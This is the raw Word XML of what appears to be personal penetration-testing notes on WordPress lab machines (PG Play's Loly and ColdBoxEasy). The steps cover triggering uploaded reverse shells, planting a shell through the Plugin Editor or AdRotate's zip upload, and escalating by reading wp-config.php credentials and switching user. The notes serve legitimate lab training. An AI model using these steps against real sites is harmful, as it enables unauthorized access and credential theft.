      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now, to active it, we have to go to a certain directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /wp-content/uploads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For me, I see 2025 directory and then a 07 directory since it's 7/10/2025 for me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-content/uploads/2025/07/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From there, I click on my reverse shell to activate it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D70">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rsoc1dyuos79" w:id="401"/>
      <w:bookmarkEnd w:id="401"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using "Plugin Editor" button for plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId982">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writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once logged in we can attempt to gain a reverse shell by editing a plugin with the “Plugin Editor” and replacing any .php file with our reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then accessing the plugin at http://192.168.158.55/shenzi/wp-content/plugins/&lt;plugin name&gt;/&lt;edited.php&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D77">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7wdafu14epyl" w:id="402"/>
      <w:bookmarkEnd w:id="402"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with Admin Privileges using AdRotate Plugin</w:t>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t xml:space="preserve">In a previous section, we learned how to get rev shell using the "Editor" and copy and pasting a reverse shell into the website code. But, sometimes, there isn't an "editor," so we can't edit the web page source code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId983">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Loly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we had to abuse the AdRotate Plugin to upload a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3467100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="411" name="image396.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image396.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98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2D7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the "Plugins" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The AdRotate plugin looks interesting, it allows us to upload zip files. The last time I used this, the zip files were automatically getting unzipped after upload. We find the same behavior on this website. We upload our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php-reverse-shell.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and get the reverse-shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip -r php-reverse-shell.php.zip php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="315" name="image310.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image310.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98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2D82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to "Manage Media" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a listener </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploads file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and you should get a connection for reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5idqugp9vlgy" w:id="403"/>
      <w:bookmarkEnd w:id="403"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to privilege escalate in Wordpress after getting terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D87">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId986">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId987">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, we just got a reverse shell from wordpress into the www-data account, but it's kind of useless. So, we want to priv esc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One place we should always look is the "/var/www/html" where the username and password of the user will be stored in the config files (wp-config)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4886856" cy="3015128"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="114" name="image107.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image107.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId988"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4886856" cy="3015128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we got the username and password. Now we need to switch user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su coldd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in the password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we are logined in as c0ldd and now try to access the files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
